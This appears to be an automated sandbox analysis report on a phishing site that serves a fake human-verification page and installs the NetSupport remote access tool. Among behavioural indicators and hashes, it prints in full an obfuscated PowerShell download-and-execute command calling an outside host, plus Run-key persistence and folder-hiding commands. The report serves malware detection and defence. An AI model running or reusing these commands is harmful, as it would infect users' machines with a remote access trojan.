Resubmissions
23/10/2024, 01:15  241023-bmlphstemh  4
23/10/2024, 00:50  241023-a65q3asfkh  4
23/10/2024, 00:31  241023-at4y1asana  4
22/10/2024, 14:58  241022-schzba1apc  10
22/10/2024, 12:40  241022-pwj4yavgmd  10
Analysis
max time kernel: 123s
max time network: 125s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
submitted: 22/10/2024, 14:58
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://holidaybunch.com
Resource: win10v2004-20241007-en
General
Target: https://holidaybunch.com
Malware Config
Extracted
https://holidaybunch.com/Ray-verify.html
Extracted
http://traversecityspringbreak.com/o/o.png
Signatures
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
Blocklisted process makes network request 4 IoCs
flow  pid   Process
56    5904  mshta.exe
58    5904  mshta.exe
60    5904  mshta.exe
64    5372  powershell.exe
Downloads MZ/PE file
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description  ioc  Process
Key value queried  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation  mshta.exe
Executes dropped EXE 1 IoCs
pid   Process
5656  client32.exe
Loads dropped DLL 5 IoCs
pid   Process
5656  client32.exe
5656  client32.exe
5656  client32.exe
5656  client32.exe
5656  client32.exe
Adds Run key to start application 2 TTPs 1 IoCs
description  ioc  Process
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\PQRMwm\\client32.exe"  powershell.exe
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description  ioc  Process
File opened (read-only)  \??\A:  client32.exe
File opened (read-only)  \??\N:  client32.exe
File opened (read-only)  \??\O:  client32.exe
File opened (read-only)  \??\P:  client32.exe
File opened (read-only)  \??\S:  client32.exe
File opened (read-only)  \??\Z:  client32.exe
File opened (read-only)  \??\B:  client32.exe
File opened (read-only)  \??\E:  client32.exe
File opened (read-only)  \??\J:  client32.exe
File opened (read-only)  \??\V:  client32.exe
File opened (read-only)  \??\Y:  client32.exe
File opened (read-only)  \??\I:  client32.exe
File opened (read-only)  \??\K:  client32.exe
File opened (read-only)  \??\Q:  client32.exe
File opened (read-only)  \??\U:  client32.exe
File opened (read-only)  \??\X:  client32.exe
File opened (read-only)  \??\G:  client32.exe
File opened (read-only)  \??\H:  client32.exe
File opened (read-only)  \??\L:  client32.exe
File opened (read-only)  \??\M:  client32.exe
File opened (read-only)  \??\R:  client32.exe
File opened (read-only)  \??\T:  client32.exe
File opened (read-only)  \??\W:  client32.exe
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid   Process
1028  cmd.exe
Detected phishing page
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc  Process
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  client32.exe
Enumerates system info in registry 2 TTPs 3 IoCs
description  ioc  Process
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  msedge.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  msedge.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid   Process
3304  ipconfig.exe
Modifies Control Panel 28 IoCs
description  ioc  Process
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\Arrow  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeNS  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeNWSE  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeWE  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeWE = "C:\\Windows\\cursors\\aero_ew.cur"  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeAll  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\NWPen = "C:\\Windows\\cursors\\aero_pen.cur"  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeNWSE = "C:\\Windows\\cursors\\aero_nwse.cur"  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\UpArrow = "C:\\Windows\\cursors\\aero_up.cur"  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\IBeam  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\NWPen  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\Wait  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeNESW = "C:\\Windows\\cursors\\aero_nesw.cur"  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeNS = "C:\\Windows\\cursors\\aero_ns.cur"  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\Crosshair  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\cursors\\aero_arrow.cur"  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\Help = "C:\\Windows\\cursors\\aero_helpsel.cur"  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\Help  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\UpArrow  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeAll = "C:\\Windows\\cursors\\aero_move.cur"  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\AppStarting  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\No  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\No = "C:\\Windows\\cursors\\aero_unavail.cur"  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\Wait = "C:\\Windows\\cursors\\aero_busy.ani"  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\Hand  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\SizeNESW  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\cursors\\aero_working.ani"  client32.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\Cursors\Hand = "C:\\Windows\\cursors\\aero_link.cur"  client32.exe
Modifies Internet Explorer settings 2 IoCs
description  ioc  Process
Set value (int)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\Main\SmoothScroll = "0"  client32.exe
Set value (int)  \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Internet Explorer\Main\SmoothScroll = "1"  client32.exe
Modifies data under HKEY_USERS 15 IoCs
description  ioc  Process
Set value (data)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00  LogonUI.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History  LogonUI.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM  LogonUI.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"  LogonUI.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"  LogonUI.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent  LogonUI.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"  LogonUI.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"  LogonUI.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"  LogonUI.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"  LogonUI.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"  LogonUI.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "157"  LogonUI.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"  LogonUI.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"  LogonUI.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"  LogonUI.exe
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid   Process
1444  msedge.exe
1444  msedge.exe
3808  msedge.exe
3808  msedge.exe
3704  identity_helper.exe
3704  identity_helper.exe
5372  powershell.exe
5372  powershell.exe
5372  powershell.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid   Process
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs
description  pid   Process
Token: SeDebugPrivilege  5372  powershell.exe
Token: SeSecurityPrivilege  5656  client32.exe
Token: SeShutdownPrivilege  5656  client32.exe
Suspicious use of FindShellTrayWindow 29 IoCs
pid   Process
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
5656  client32.exe
3808  msedge.exe
5656  client32.exe
5656  client32.exe
Suspicious use of SendNotifyMessage 25 IoCs
pid   Process
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
3808  msedge.exe
5656  client32.exe
Suspicious use of SetWindowsHookEx 1 IoCs
pid   Process
2160  LogonUI.exe
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3808 wrote to memory of 3032 3808 msedge.exe 84 PID 3808 wrote to memory of 3032 3808 msedge.exe 84 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 
msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 3084 3808 msedge.exe 85 PID 3808 wrote to memory of 1444 3808 msedge.exe 86 PID 3808 wrote to memory of 1444 3808 msedge.exe 86 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 PID 3808 wrote to memory of 2784 3808 msedge.exe 87 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1984 attrib.exe
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  PID:3808
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://holidaybunch.com
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  PID:3032
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xb4,0x108,0x7ffdcccc46f8,0x7ffdcccc4708,0x7ffdcccc4718
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  PID:3084
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  PID:1444
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
    - Suspicious behavior: EnumeratesProcesses
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  PID:2784
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2616 /prefetch:8
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  PID:3120
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  PID:1764
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe  PID:2804
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe  PID:3704
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  PID:5568
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  PID:5576
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  PID:5920
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  PID:5928
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,10474178599212311863,1162929789329723507,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe  PID:5076
  C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe  PID:4568
  C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\mshta.exe  PID:5904
  "C:\Windows\system32\mshta.exe" https://holidaybunch.com/Ray-verify.html # ''Verify you are human - Ray Verification ID: 5328''
  - Blocklisted process makes network request
  - Checks computer location settings
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  PID:5372
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
    - Blocklisted process makes network request
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\ipconfig.exe  PID:3304
      "C:\Windows\system32\ipconfig.exe" /flushdns
      - Gathers network information
    C:\Windows\system32\cmd.exe  PID:1028
      "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Admin\AppData\Roaming\PQRMwm
      - Hide Artifacts: Hidden Files and Directories
      C:\Windows\system32\attrib.exe  PID:1984
        attrib +h C:\Users\Admin\AppData\Roaming\PQRMwm
        - Views/modifies file attributes
    C:\Users\Admin\AppData\Roaming\PQRMwm\client32.exe  PID:5656
      "C:\Users\Admin\AppData\Roaming\PQRMwm\client32.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Enumerates connected drives
      - System Location Discovery: System Language Discovery
      - Modifies Control Panel
      - Modifies Internet Explorer settings
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
C:\Windows\System32\rundll32.exe  PID:3644
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\LogonUI.exe  PID:2160
  "LogonUI.exe" /flags:0x4 /state0:0xa38c1855 /state1:0x41c64e6d
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
  Boot or Logon Autostart Execution 1
    Registry Run Keys / Startup Folder 1
Defense Evasion
  Hide Artifacts 2
    Hidden Files and Directories 2
  Modify Registry 2
Downloads

Filesize 152B
MD5 dc058ebc0f8181946a312f0be99ed79c
SHA1 0c6f376ed8f2d4c275336048c7c9ef9edf18bff0
SHA256 378701e87dcff90aa092702bc299859d6ae8f7e313f773bf594f81df6f40bf6a
SHA512 36e0de64a554762b28045baebf9f71930c59d608f8d05c5faf8906d62eaf83f6d856ef1d1b38110e512fbb1a85d3e2310be11a7f679c6b5b3c62313cc7af52aa

Filesize 152B
MD5 a0486d6f8406d852dd805b66ff467692
SHA1 77ba1f63142e86b21c951b808f4bc5d8ed89b571
SHA256 c0745fd195f3a51b27e4d35a626378a62935dccebefb94db404166befd68b2be
SHA512 065a62032eb799fade5fe75f390e7ab3c9442d74cb8b520d846662d144433f39b9186b3ef3db3480cd1d1d655d8f0630855ed5d6e85cf157a40c38a19375ed8a

Filesize 253B
MD5 e54bd90687c7a48c962af4fef19e2169
SHA1 12f2e25af1d9b83e44165bdbe607a5cf8b6c709e
SHA256 d4b137c5ce43c6a01ae5914e409a00bda79d58e239d8fc3d7d9f358188bc695e
SHA512 ecdbe859ff50374db5bf9c5082dfddb966840d925ea32d0b18a4337a7e0078712f37d72cd2383baa4e6344df5e3be43553fa3d6793967249d7319384bcc13750

Filesize 6KB
MD5 04e025937d98e60fc59aad08bf1163af
SHA1 93ed794f1edfd4ddd28694dd1626b5b092aba0c3
SHA256 c3f70791594bf048a430b71a95525088936715efb3f5e80c7e927b6fcb07017e
SHA512 a05624ec92108ea26a0f87fbcc7960c65aa9a4d4a6fc8018e75566487f3ac6dca36e8fb46c6e83afa51e02eb29d564eb8e2eb2e14f0313c9406a1672874bd834

Filesize 6KB
MD5 487387c793561f080e95fb2da4bb0c9d
SHA1 57d78a003515db7aa690557a80c72c32a692726f
SHA256 60ba77224d3bc684073c9994354bca09e1223d99eccb2f7f99c3389d3b48d9cf
SHA512 82a495c1d2eb9f3d62f8ca6da5b8104764642f10eb52eea825a86ecf671fece53b61fbaf20bbd854ae68e0ea04118cae72ed04b303d5516ac3f828917a93d929

Filesize 5KB
MD5 6312b01498949d1c639059fada2fcf95
SHA1 fa1acda5f160705ac5b4f9375cd6bcda2925b4a6
SHA256 321690b86e233aaaa5d17aa274914f2e204ff6313d20922e11c88f3ec4eda1f7
SHA512 b375dc32cfd04d4e58e1b1c9b5fda26a760e5bfc023c2cefff0fd0d51355703cc1b5c23250356bd2379674d33fb89f1e451a7c01bb09eed57d08638b4277ad08

Filesize 16B
MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Filesize 11KB
MD5 11386d984fdcd7f700b2ffd29e07b62b
SHA1 1d0b23b60a7a7727d4287969055a460882f08d76
SHA256 acb2b12d93e5d8cca48e1ebc8b69d0c487265c2fdad864ce15bc039863a438e8
SHA512 320d7ef8466fc165339b28a99bc8a1d062729cfaf18ec72d7788dc785266a750ca69833ace559688c431c4a3b5f4eba2729ead4be414a8b51d26ad418713f855

Filesize 11KB
MD5 d110accf3ae0b1338a96db51976066fe
SHA1 a50c81e9e6ee2739e08584ce17d96ea13588d7f4
SHA256 d4f221bb9acaea2d1419e667da1a23653efb5d84143c1494f7201f89d15816d4
SHA512 fdd324b6b1c302742c648d0ab702f18ccc18787a287b362ad15fa3b53bd39009ea89baeb6d889c9d2c8b1cb5277578c7b0ef81040471f09173ac6c99c9d13d15

Filesize 11KB
MD5 b6e7d817b1fe21cfa7ec04a8980bbb69
SHA1 d66f8fbb467a26cf9a11600cb63e4d475407c736
SHA256 9f3f331b269677cad842c3ed42cb85c21e060a8fd4687a897a90cc2770fbe5d0
SHA512 69494161506112479431fcbc27f26d1cf7a50ff170620c723513e293d4d7d3f090a1377585356a48802d974cd875703bbff5b94dea3e601a78701fbe6a04695e

Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize 320KB
MD5 2d3b207c8a48148296156e5725426c7f
